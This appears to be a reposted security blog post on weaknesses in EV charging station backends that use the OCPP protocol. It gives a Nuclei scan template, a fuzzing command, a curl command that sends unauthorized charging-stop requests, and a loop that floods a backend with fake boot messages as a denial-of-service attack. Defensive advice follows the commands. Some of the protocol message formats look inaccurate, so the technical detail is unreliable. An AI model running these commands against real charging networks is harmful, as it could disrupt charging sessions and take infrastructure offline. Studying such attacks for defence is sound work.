EV Charging Station Security: OCPP Vulnerabilities and Exploitation

Listen to this Post

Featured Image
Continued into EV charging station management systems and OCPP vulnerabilities. After setting up a charging station backend on my machine, I wrote a Nuclei template to detect unauthenticated backends. Key findings include:
– CP ID enumeration
– DoS attacks
– Charging stop commands
– Protocol manipulation

Many systems still lack proper authentication, leaving them vulnerable to exploitation.

You Should Know:

1. Identifying Unauthenticated OCPP Backends

Use Nuclei with a custom template to scan for exposed OCPP backends:

nuclei -t ocpp-auth-check.yaml -u https://target-ev-backend.com -severity high

Example `ocpp-auth-check.yaml`:

id: ocpp-auth-bypass 
info: 
name: OCPP Unauthenticated Endpoint Detection 
author: YourName 
severity: high 
requests: 
- method: POST 
path: 
- "{{BaseURL}}/ocpp" 
headers: 
Content-Type: application/json 
body: '{"messageType": 2, "action": "BootNotification"}' 
matchers: 
- type: word 
words: 
- "status" 
- "accepted" 
condition: and 

2. OCPP Protocol Fuzzing

Use wfuzz to test OCPP parameters:

wfuzz -c -z file,/usr/share/wordlists/payloads.txt -d '{"chargePointId":FUZZ}' -H "Content-Type: application/json" https://target-ev-backend.com/ocpp

3. Charging Session Manipulation

Send unauthorized stop commands (if auth is missing):

curl -X POST https://target-ev-backend.com/ocpp -H "Content-Type: application/json" -d '{"messageType": 2, "action": "RemoteStopTransaction", "transactionId": 123}'

4. DoS Attack Simulation

Flood the OCPP backend with fake BootNotifications:

for i in {1..1000}; do curl -X POST https://target-ev-backend.com/ocpp -H "Content-Type: application/json" -d '{"messageType": 2, "action": "BootNotification"}'; done

5. OCPP 2.0.1/2.1 Security Testing

Check for insecure firmware updates:

openssl s_client -connect target-ev-backend.com:443 | openssl x509 -noout -text | grep -i "issuer|validity"

What Undercode Say

EV charging infrastructure remains a high-risk target due to weak authentication and protocol flaws. Security teams must:
– Enforce TLS 1.3 for OCPP communications.
– Implement certificate pinning in firmware.
– Monitor for anomalous OCPP commands (e.g., unexpected RemoteStart/Stop).
– Use hardened Linux firewalls (iptables/nftables) to restrict OCPP traffic.

Expected Output:

[+] https://target-ev-backend.com/ocpp - Unauthenticated OCPP Endpoint (High) 
[+] Possible DoS via BootNotification Spam 
[+] RemoteStopTransaction without Auth 

Prediction

As EV adoption grows, OCPP attacks will rise, leading to disrupted charging networks, data theft, and firmware hijacking. Vendors must adopt zero-trust models before large-scale exploits occur.

(Relevant OCPP Security Best Practices)

References:

Reported By: Gagan Bagh – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram